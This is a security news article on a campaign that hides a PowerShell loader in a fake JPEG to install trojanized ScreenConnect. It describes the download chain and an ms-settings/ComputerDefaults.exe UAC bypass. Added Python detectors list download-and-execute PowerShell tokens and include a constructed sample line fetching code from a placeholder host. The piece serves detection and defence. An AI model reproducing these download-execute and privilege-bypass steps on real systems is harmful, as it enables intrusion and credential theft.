
Hackers Use Weaponized JPEG File to Deploy Trojanized ScreenConnect Malware

Cybersecurity News · Archived May 11, 2026




By Tushar Subhra Dutta, May 11, 2026

A sophisticated new cyberattack campaign is targeting Windows systems using a fake image file to sneak dangerous malware past security defenses. The operation, named Operation SilentCanvas, tricks victims into running a malicious PowerShell script disguised as a harmless JPEG photo, ultimately handing attackers full and silent control of the infected machine.

The attack begins when a victim receives what appears to be a routine image file called sysupdate.jpeg through a phishing email, a fake software update prompt, or a deceptive file-sharing link. Despite carrying a .jpeg extension, the file contains no actual image data. Instead, it holds a PowerShell script engineered to quietly set up a staging environment and pull down additional malicious components from attacker-controlled servers.

Researchers at Cyfirma identified and analyzed the full attack chain, revealing just how deep the intrusion goes once the file is opened. The campaign does not rely on a single trick but chains together multiple advanced techniques to avoid detection and maintain a firm foothold inside targeted environments.

Once the initial file runs, the malware downloads a trojanized version of ConnectWise ScreenConnect, a legitimate remote access tool widely used across enterprise networks. The altered version gives attackers a persistent hidden back door while appearing to blend in with trusted software already present on the system.

The threat also gains elevated privileges without triggering any visible security warning. It does this through a fileless technique that manipulates a Windows registry path and abuses a trusted Windows binary to silently bypass the standard User Account Control prompt.

How the Weaponized JPEG Deploys the Malware

The sysupdate.jpeg file lacks the standard image header that all real JPEG files carry.
When a victim opens it, Windows does not flag it as a script because the extension mimics an image. The embedded PowerShell code creates a hidden folder at C:\Systems and downloads a trojanized ScreenConnect package from legitserver.theworkpc[.]com over TCP port 5443. To avoid antivirus detection, the malware reconstructs dangerous command strings at runtime rather than writing them plainly in the file. It also downloads a secondary payload named access.jpeg and runs it directly in memory, so no suspicious executable touches the disk. Microsoft’s own .NET compiler, csc.exe, then builds a custom launcher named uds.exe directly on the victim machine, giving each compiled binary a unique fingerprint that defeats signature-based scanning.

Figure: Multi-Stage Infection Chain Overview (Source – Cyfirma)

The multi-stage infection chain shows the end-to-end attack workflow, beginning with social engineering and weaponized JPEG delivery, followed by PowerShell payload execution, AMSI bypass, and trojanized ScreenConnect deployment.

After the launcher runs, the malware hijacks a registry key tied to the ms-settings protocol and redirects it toward uds.exe. It then triggers ComputerDefaults.exe, a trusted Windows binary that auto-elevates, causing the payload to run with full administrator rights and no visible prompt. The registry key enabling this bypass is deleted within two seconds, destroying evidence before any investigator can find it.

Post-Compromise Capabilities and Persistence

Once the trojanized ScreenConnect framework is active, the attacker gains remarkable control over the infected machine. The modified software supports real-time screen monitoring, video recording, microphone capture, clipboard interception, keystroke logging, and silent file transfers through an encrypted channel designed to block network inspection.
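A file-triage check for the masquerade described above (a .jpeg name with no image header and PowerShell text inside), added here as an example rather than code from the article or from Cyfirma; the token list and the two sample byte strings are constructed for illustration.

```python
# JPEG files begin with the SOI marker FF D8 FF; text stored under a .jpeg name does not.
JPEG_SOI = b"\xff\xd8\xff"

# Assumed indicator set: PowerShell fragments that never belong inside image data.
SCRIPT_TOKENS = (b"invoke-expression", b"iex(", b"net.webclient", b"downloadstring",
                 b"-encodedcommand", b"frombase64string", b"csc.exe", b"ms-settings")

def triage_image(data: bytes) -> dict:
    """Classify bytes that arrived under an image name: image, masqueraded script or suspicious."""
    has_soi = data.startswith(JPEG_SOI)
    low = data.lower()                      # case-insensitive token search
    hits = [t.decode() for t in SCRIPT_TOKENS if t in low]
    # Compressed image data is mostly non-printable; a script is almost entirely text.
    printable = sum(32 <= b < 127 or b in (9, 10, 13) for b in data)
    text_ratio = printable / max(len(data), 1)
    if has_soi and not hits:
        verdict = "likely_image"
    elif not has_soi and (hits or text_ratio > 0.9):
        verdict = "masqueraded_script"
    else:
        verdict = "suspicious"              # e.g. a real header with script text appended
    return {"verdict": verdict, "has_jpeg_header": has_soi,
            "script_tokens": hits, "text_ratio": round(text_ratio, 2)}

# Constructed samples, not the campaign's files: a minimal JFIF header followed by
# binary filler, and PowerShell text saved under an image name.
REAL_JPEG = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00" + bytes(range(256))
FAKE_JPEG = (b"# constructed sample saved as sysupdate.jpeg\n"
             b"$wc = New-Object Net.WebClient\n"
             b"Invoke-Expression $wc.DownloadString('https://example.invalid/not-real')\n")

if __name__ == "__main__":
    for name, blob in (("real.jpeg", REAL_JPEG), ("fake.jpeg", FAKE_JPEG)):
        print(name, triage_image(blob))
```

The header check alone is not a verdict: a polyglot that keeps a valid SOI and appends script text lands in the "suspicious" bucket, which is why the token scan and text ratio are evaluated regardless of the header.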
Figure: Hex-level static analysis of the weaponized sysupdate.jpeg payload (Source – Cyfirma)

The hex-level static analysis of the weaponized sysupdate.jpeg payload shows the embedded PowerShell staging logic and malicious infrastructure references.

The malware creates a hidden desktop environment operating out of the logged-in user’s view, allowing the attacker to run tools without detection. A persistent Windows service named OneDriveServers keeps the malware alive across reboots. A separate component intercepts usernames and passwords at the Windows login screen before they reach the authentication system, and hidden local administrator accounts can be created for long-term access.

Security teams are advised to block or closely monitor execution of commonly abused Windows binaries, including csc.exe, cvtres.exe, and ComputerDefaults.exe. Organizations should enforce strict controls over remote access platforms, deploy detection rules for suspicious PowerShell behavior, and isolate any system showing unexpected ScreenConnect activity. Credential resets for all privileged accounts are strongly recommended following any suspected exposure.
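A small correlation detector for the sequence the article describes (ms-settings handler written, ComputerDefaults.exe launched, key deleted within seconds) plus PowerShell spawning the csc.exe/cvtres.exe compilers, run over constructed Sysmon-style events. This is an added example, not tooling from the article, Cyfirma or ConnectWise; the event field names, the 10-second window and the sample SID are assumptions.

```python
from datetime import datetime, timedelta

# Case-insensitive suffix of the registry path whose handler ComputerDefaults.exe consults.
MS_SETTINGS_KEY = r"\software\classes\ms-settings\shell\open\command"
AUTO_ELEVATE = {"computerdefaults.exe"}   # auto-elevating binary named in the article
COMPILERS = {"csc.exe", "cvtres.exe"}     # on-host compilation chain that produced uds.exe
WINDOW = timedelta(seconds=10)            # assumed correlation window

def _ts(ev):
    return datetime.fromisoformat(ev["time"])

def _is_ms_settings(ev):
    return ev["type"].startswith("registry") and ev["key"].lower().endswith(MS_SETTINGS_KEY)

def detect(events):
    """Return alert strings for the hijack sequence and PowerShell-spawned compilers."""
    events = sorted(events, key=_ts)
    alerts = []
    for i, ev in enumerate(events):
        t = ev["time"]
        if ev["type"] == "process" and ev["image"].lower() in COMPILERS \
                and ev["parent"].lower() == "powershell.exe":
            alerts.append(f"{t} powershell.exe spawned {ev['image']}: on-host compilation")
        if ev["type"] == "registry_set" and _is_ms_settings(ev):
            for nxt in events[i + 1:]:            # look ahead for the auto-elevating launch
                if _ts(nxt) - _ts(ev) > WINDOW:
                    break
                if nxt["type"] == "process" and nxt["image"].lower() in AUTO_ELEVATE:
                    alerts.append(f"{nxt['time']} {nxt['image']} after ms-settings handler "
                                  f"set to {ev['value']}: UAC bypass")
                    break
        if ev["type"] == "registry_delete" and _is_ms_settings(ev):
            prior = [p for p in events[:i] if p["type"] == "registry_set"
                     and p["key"].lower() == ev["key"].lower() and _ts(ev) - _ts(p) <= WINDOW]
            if prior:                             # short-lived key = evidence cleanup
                secs = int((_ts(ev) - _ts(prior[-1])).total_seconds())
                alerts.append(f"{t} ms-settings key deleted {secs}s after creation: evidence cleanup")
    return alerts

# Constructed telemetry modelled on the article's chain (not real logs).
KEY = r"HKU\S-1-5-21-1111\Software\Classes\ms-settings\Shell\Open\command"
SAMPLE = [
    {"time": "2026-05-11T10:00:00", "type": "process", "image": "powershell.exe", "parent": "explorer.exe"},
    {"time": "2026-05-11T10:00:05", "type": "process", "image": "csc.exe", "parent": "powershell.exe"},
    {"time": "2026-05-11T10:00:06", "type": "process", "image": "cvtres.exe", "parent": "csc.exe"},
    {"time": "2026-05-11T10:00:09", "type": "registry_set", "key": KEY, "value": r"C:\Systems\uds.exe"},
    {"time": "2026-05-11T10:00:10", "type": "process", "image": "ComputerDefaults.exe", "parent": "powershell.exe"},
    {"time": "2026-05-11T10:00:11", "type": "registry_delete", "key": KEY},
]

if __name__ == "__main__":
    for line in detect(SAMPLE):
        print(line)
```

cvtres.exe launched by csc.exe is deliberately not flagged, since that is how a normal compile looks; the signal is the compiler chain hanging off PowerShell, and the registry/ComputerDefaults.exe pairing catches the bypass even when the key is gone before a responder looks.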
Indicators of Compromise (IoCs):

Type        Indicator                        Description
File Name   sysupdate.jpeg                   Weaponized PowerShell loader disguised as JPEG
File Name   access.jpeg                      Secondary obfuscated in-memory payload
File Name   uds.exe                          On-host compiled malicious launcher binary
File Path   C:\Systems                       Attacker staging directory created on victim machine
File Path   C:\ProgramData\OneDriveServer\   Trojanized ScreenConnect deployment directory

Note: IP addresses and domains are intentionally defanged (e.g., [.]) to prevent accidental resolution or hyperlinking. Re-fang only within controlled threat intelligence platforms such as MISP, VirusTotal, or your SIEM.

Tushar Subhra Dutta is a senior cybersecurity and breach reporter. He specializes in covering cybersecurity news, trends, emerging threats, data breaches, and malware attacks. With years of experience, he brings clarity and depth to complex security topics.